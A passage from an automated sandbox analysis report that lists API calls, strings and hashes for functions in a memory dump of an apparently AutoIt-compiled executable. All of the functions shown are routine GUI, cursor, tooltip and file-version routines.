SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 004C8AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004C8AD2
CharNextW.USER32(0000014E), ref: 004C8B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 004C8B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 004C8B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004C8B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 004C8B86
SetWindowTextW.USER32(?,0000014E), ref: 004C8BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 004C8BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 004C8C1F
_memset.LIBCMT ref: 004C8C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 004C8C8D
_memset.LIBCMT ref: 004C8CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 004C8D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 004C8D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 004C8E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 004C8E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004C8E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004C8EB4
DrawMenuBar.USER32(?), ref: 004C8EC3
SetWindowTextW.USER32(?,0000014E), ref: 004C8EEB

Strings

0, xrefs: 004C8E55

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: e1a5b5701f6b1e951574ab8827e50471e343b9a141817af2675f117ed2714a21
Instruction ID: b5f5491552fda37e6c3de8d619d5cabe38174104f6b348060484271ba381a119
Opcode Fuzzy Hash: e1a5b5701f6b1e951574ab8827e50471e343b9a141817af2675f117ed2714a21
Instruction Fuzzy Hash: 39E18F78900208AADF609F51CC84FEF7BB9EF05710F10815FFA15AA290DB789985DF69

Function 004C488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004C49CA
GetDesktopWindow.USER32 ref: 004C49DF
GetWindowRect.USER32(00000000), ref: 004C49E6
GetWindowLongW.USER32(?,000000F0), ref: 004C4A48
DestroyWindow.USER32(?), ref: 004C4A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004C4A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004C4ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 004C4AE1
SendMessageW.USER32(?,00000421,?,?), ref: 004C4AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004C4B09
IsWindowVisible.USER32(?), ref: 004C4B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 004C4B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 004C4B58
GetWindowRect.USER32(?,?), ref: 004C4B70
MonitorFromPoint.USER32(?,?,00000002), ref: 004C4B96
GetMonitorInfoW.USER32(00000000,?), ref: 004C4BB0
CopyRect.USER32(?,?), ref: 004C4BC7
SendMessageW.USER32(?,00000412,00000000), ref: 004C4C32

Strings

0, xrefs: 004C4975
tooltips_class32, xrefs: 004C4A96
(, xrefs: 004C4BA3

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 7c84f711ea3b3e7e4d432d235b45c6e1f65664b8a3d7d4b561a3c3b9c6898da4
Instruction ID: ac6cd99c22c26dd7847841bbc7983a3e7b9a0a81ea74da1f56fc1fe5ae721ce6
Opcode Fuzzy Hash: 7c84f711ea3b3e7e4d432d235b45c6e1f65664b8a3d7d4b561a3c3b9c6898da4
Instruction Fuzzy Hash: B6B19A74604340AFDB44DF65C948F6BBBE4BB84304F00892EF9999B2A1DB79EC05CB59

Function 004A449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 004A44AC
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004A44D2
_wcscpy.LIBCMT ref: 004A4500
_wcscmp.LIBCMT ref: 004A450B
_wcscat.LIBCMT ref: 004A4521
_wcsstr.LIBCMT ref: 004A452C
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 004A4548
_wcscat.LIBCMT ref: 004A4591
_wcscat.LIBCMT ref: 004A4598
_wcsncpy.LIBCMT ref: 004A45C3

Strings

\VarFileInfo\Translation, xrefs: 004A4540
StringFileInfo\, xrefs: 004A451B
DefaultLangCodepage, xrefs: 004A45AB
04090000, xrefs: 004A457E
%u.%u.%u.%u, xrefs: 004A4626

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 47969e8d66f45b473e22b789cf468c58a51cf548eab75862b78352d0c7820c6d
Instruction ID: d4369273d0f4150de368d06dd73a652128309a1c25c25678f4f0c4de77744982
Opcode Fuzzy Hash: 47969e8d66f45b473e22b789cf468c58a51cf548eab75862b78352d0c7820c6d
Instruction Fuzzy Hash: 6A41E471A002147BDB10AA768C46FBF776CDF92714F10046FF905E6182FA6D9A0186AE

Function 004427D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004428BC
GetSystemMetrics.USER32(00000007), ref: 004428C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004428EF
GetSystemMetrics.USER32(00000008), ref: 004428F7
GetSystemMetrics.USER32(00000004), ref: 0044291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00442939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00442949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0044297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00442990
GetClientRect.USER32(00000000,000000FF), ref: 004429AE
GetStockObject.GDI32(00000011), ref: 004429CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 004429D5

Part of subcall function 00442344: GetCursorPos.USER32(?), ref: 00442357
Part of subcall function 00442344: ScreenToClient.USER32(005057B0,?), ref: 00442374
Part of subcall function 00442344: GetAsyncKeyState.USER32(00000001), ref: 00442399
Part of subcall function 00442344: GetAsyncKeyState.USER32(00000002), ref: 004423A7

SetTimer.USER32(00000000,00000000,00000028,00441256), ref: 004429FC

Strings

AutoIt v3 GUI, xrefs: 00442974

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: e84a77accd45905372ad8d7892a0d104a15cb070ff42a68e5c26d358bf083165
Instruction ID: 883f0da41d4265601aa5a9a1bdf04b89ca0245b04e8de3223f787fdd89164401
Opcode Fuzzy Hash: e84a77accd45905372ad8d7892a0d104a15cb070ff42a68e5c26d358bf083165
Instruction Fuzzy Hash: 21B17171600209EFDB14DFA8DD45BAE7BB5FB08314F50822AFA15E7290DB789845CF58

Function 0049A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0049A47A
__swprintf.LIBCMT ref: 0049A51B
_wcscmp.LIBCMT ref: 0049A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0049A583
_wcscmp.LIBCMT ref: 0049A5BF
GetClassNameW.USER32(?,?,00000400), ref: 0049A5F6
GetDlgCtrlID.USER32(?), ref: 0049A648
GetWindowRect.USER32(?,?), ref: 0049A67E
GetParent.USER32(?), ref: 0049A69C
ScreenToClient.USER32(00000000), ref: 0049A6A3
GetClassNameW.USER32(?,?,00000100), ref: 0049A71D
_wcscmp.LIBCMT ref: 0049A731
GetWindowTextW.USER32(?,?,00000400), ref: 0049A757
_wcscmp.LIBCMT ref: 0049A76B

Part of subcall function 0046362C: _iswctype.LIBCMT ref: 00463634

Strings

%s%u, xrefs: 0049A515

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 1c3999b28fe4a03bf0c3dc84a33323ea72c1e411aedd3d945c217ce63d1d9255
Instruction ID: 5d759f694ffdda8a35cd67ace40f0844a25bcfbec5909f9320093129345e67f7
Opcode Fuzzy Hash: 1c3999b28fe4a03bf0c3dc84a33323ea72c1e411aedd3d945c217ce63d1d9255
Instruction Fuzzy Hash: 51A19171204606BBDB14DF64C885BABBBE8FF44315F00453AE999C2250DB38E965CBDA

Function 0049AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0049AF18
_wcscmp.LIBCMT ref: 0049AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 0049AF51
CharUpperBuffW.USER32(?,00000000), ref: 0049AF6E
_wcscmp.LIBCMT ref: 0049AF8C
_wcsstr.LIBCMT ref: 0049AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 0049AFD5
_wcscmp.LIBCMT ref: 0049AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 0049B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 0049B055
_wcscmp.LIBCMT ref: 0049B065
GetClassNameW.USER32(00000010,?,00000400), ref: 0049B08D
GetWindowRect.USER32(00000004,?), ref: 0049B0F6

Strings

@, xrefs: 0049AEF9
ThumbnailClass, xrefs: 0049AFE0, 0049B060

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: b1ef70fdd89a18ed0acfe8daf96722c4f730d06f2053f8f1a99a02b0f026882e
Instruction ID: 9446134c8cd5984ec863285ba5172d522a2ae4b3abb74332ec45074b5739ba22
Opcode Fuzzy Hash: b1ef70fdd89a18ed0acfe8daf96722c4f730d06f2053f8f1a99a02b0f026882e
Instruction Fuzzy Hash: F981DD711082059BDF00DF11D985FAB7BE8EF84358F04847BED858A196DB38DD49CBAA

Function 004CC5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00442612: GetWindowLongW.USER32(?,000000EB), ref: 00442623

DragQueryPoint.SHELL32(?,?), ref: 004CC627

Part of subcall function 004CAB37: ClientToScreen.USER32(?,?), ref: 004CAB60
Part of subcall function 004CAB37: GetWindowRect.USER32(?,?), ref: 004CABD6
Part of subcall function 004CAB37: PtInRect.USER32(?,?,004CC014), ref: 004CABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 004CC690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004CC69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004CC6BE
_wcscat.LIBCMT ref: 004CC6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 004CC705
SendMessageW.USER32(?,000000B0,?,?), ref: 004CC71E
SendMessageW.USER32(?,000000B1,?,?), ref: 004CC735
SendMessageW.USER32(?,000000B1,?,?), ref: 004CC757
DragFinish.SHELL32(?), ref: 004CC75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 004CC851

Strings

@GUI_DROPID, xrefs: 004CC77E
@GUI_DRAGID, xrefs: 004CC7C9
@GUI_DRAGFILE, xrefs: 004CC800
pbP, xrefs: 004CC79B

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbP
API String ID: 169749273-4064281581
Opcode ID: 3b59d1d35b266811f1f09017e062fea44ab4cfce24a53bd0e9fb8e2e2baeeb28
Instruction ID: 5e749296eafb63781c4ebcefff7c446fe8194cadc5192e24c4bc470b38d0ef52
Opcode Fuzzy Hash: 3b59d1d35b266811f1f09017e062fea44ab4cfce24a53bd0e9fb8e2e2baeeb28
Instruction Fuzzy Hash: B8619F71108300AFD701EF65CC85EAFBBE9FF88714F40092EF595922A1DB749A49CB5A

Function 0049ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0049AC33

Strings

LAST, xrefs: 0049ABF8
ACTIVE, xrefs: 0049AC0E
REGEXP=, xrefs: 0049AC48
[LAST, xrefs: 0049ACE0
[HANDLE:, xrefs: 0049AC3F
[ALL, xrefs: 0049ACD9
[REGEXPTITLE:, xrefs: 0049AC5B
CLASSNAME=, xrefs: 0049AC70
[ACTIVE, xrefs: 0049AC20
HANDLE=, xrefs: 0049AC2C
ALL, xrefs: 0049ACC7
[CLASS:, xrefs: 0049AC83

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 07e7a2c990e415a879746d8793f2527fadc9449f97aa5eeea72e9d511f44a1f6
Instruction ID: 71ec669db58b0248d1e3c2e43b6d738e75311baabdfaa610e606b3b7de0fdee5
Opcode Fuzzy Hash: 07e7a2c990e415a879746d8793f2527fadc9449f97aa5eeea72e9d511f44a1f6
Instruction Fuzzy Hash: 5531A170948209ABEE00EA51DE43FBE7B64AB10719F30002FF501751D2EB5D6F24C69E

Function 004B4FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 004B5013
LoadCursorW.USER32(00000000,00007F00), ref: 004B501E
LoadCursorW.USER32(00000000,00007F03), ref: 004B5029
LoadCursorW.USER32(00000000,00007F8B), ref: 004B5034
LoadCursorW.USER32(00000000,00007F01), ref: 004B503F
LoadCursorW.USER32(00000000,00007F81), ref: 004B504A
LoadCursorW.USER32(00000000,00007F88), ref: 004B5055
LoadCursorW.USER32(00000000,00007F80), ref: 004B5060
LoadCursorW.USER32(00000000,00007F86), ref: 004B506B
LoadCursorW.USER32(00000000,00007F83), ref: 004B5076
LoadCursorW.USER32(00000000,00007F85), ref: 004B5081
LoadCursorW.USER32(00000000,00007F82), ref: 004B508C
LoadCursorW.USER32(00000000,00007F84), ref: 004B5097
LoadCursorW.USER32(00000000,00007F04), ref: 004B50A2
LoadCursorW.USER32(00000000,00007F02), ref: 004B50AD
LoadCursorW.USER32(00000000,00007F89), ref: 004B50B8
GetCursorInfo.USER32(?), ref: 004B50C8

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: f041062a8f5d51f7f03a92fe01b6d8e94c737694c6bf5033b4e682c3f76a790e
Instruction ID: 2aedb21641aee5a5b8469d9a58c431039fcb514827b1a5a0e39ac139a363468a
Opcode Fuzzy Hash: f041062a8f5d51f7f03a92fe01b6d8e94c737694c6bf5033b4e682c3f76a790e
Instruction Fuzzy Hash: F83103B1D083196ADB109FB68C899AFFFE8FF04750F50452BA50CE7280DA7865048EA5

Function 004CA1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004CA259
DestroyWindow.USER32(?,?), ref: 004CA2D3

Part of subcall function 00447BCC: _memmove.LIBCMT ref: 00447C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 004CA34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 004CA36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004CA382
DestroyWindow.USER32(00000000), ref: 004CA3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00440000,00000000), ref: 004CA3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004CA3F4
GetDesktopWindow.USER32 ref: 004CA40D
GetWindowRect.USER32(00000000), ref: 004CA414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004CA42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 004CA444

Part of subcall function 004425DB: GetWindowLongW.USER32(?,000000EB), ref: 004425EC

Strings

0, xrefs: 004CA26F
tooltips_class32, xrefs: 004CA346, 004CA3D4

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 527d23e5873c73bc23ee3be3d54d7af5e24ee5efe80cb517a9214c242ff007e5
Instruction ID: 6e115a7bd8f8fe4f01305fabb1c717034778cf9a24706487f4f6531f87409c6c
Opcode Fuzzy Hash: 527d23e5873c73bc23ee3be3d54d7af5e24ee5efe80cb517a9214c242ff007e5
Instruction Fuzzy Hash: 0B71AC74140248AFD765CF28CC48F6B7BE6FB88308F44452EF985873A0D778A916DB5A

Function 004C4392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004C4424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004C446F

Strings

COLLAPSE, xrefs: 004C44B5
EXISTS, xrefs: 004C44D8
SELECT, xrefs: 004C4620
GETSELECTED, xrefs: 004C457F
EXPAND, xrefs: 004C4521
UNCHECK, xrefs: 004C464B
GETITEMCOUNT, xrefs: 004C4551
GETTOTALCOUNT, xrefs: 004C4456
GETTEXT, xrefs: 004C45C2
CHECK, xrefs: 004C448F
ISCHECKED, xrefs: 004C45F2

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: e5babe1c394d8b778efdb0719c7c23d21f9ff85bc9721dab8cb6efced076bae0
Instruction ID: 0258a93f9b12fd2f4f60ab2da405bdc5f16e2d5d2f5bdd6ca15b7dd36ad2df3d
Opcode Fuzzy Hash: e5babe1c394d8b778efdb0719c7c23d21f9ff85bc9721dab8cb6efced076bae0
Instruction Fuzzy Hash: D2918F742003019BCB14EF15C561B6FB7E1AF95358F04846EF8925B3A2DB39ED0ADB4A

Function 004CB7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004CB8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004C91C2), ref: 004CB910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004CB949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 004CB98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004CB9C3
FreeLibrary.KERNEL32(?), ref: 004CB9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004CB9DF
DestroyIcon.USER32(?,?,?,?,?,004C91C2), ref: 004CB9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 004CBA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 004CBA17

Part of subcall function 00462EFD: __wcsicmp_l.LIBCMT ref: 00462F86

Strings

.dll, xrefs: 004CB86D
.exe, xrefs: 004CB84A
.icl, xrefs: 004CB82A

Memory Dump Source

Source File: 00000000.00000002.1517585039.0000000000441000.00000020.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true

Associated: 00000000.00000002.1517572973.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517627020.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517662005.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1517677755.0000000000507000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_440000_AxKxwW9WGa.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 0c8f0afb163a1dfb3e6a9d0c956d9b074c1eb4c6868e6bca98a6c305516a873f
Instruction ID: f2709ed154fd92708d28bcea05426b1666bff8fb2244e82d0ccab02af25c177d
Opcode Fuzzy Hash: 0c8f0afb163a1dfb3e6a9d0c956d9b074c1eb4c6868e6bca98a6c305516a873f
Instruction Fuzzy Hash: D361E0B1900619BAEB54DF65CC42FBF7BACFB08710F10412AF915D61C0DB78A994DBA8

Function 004AA352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00449837: __itow.LIBCMT ref: 00449862
Part of subcall function 00449837: __swprintf.LIBCMT ref: 004498AC

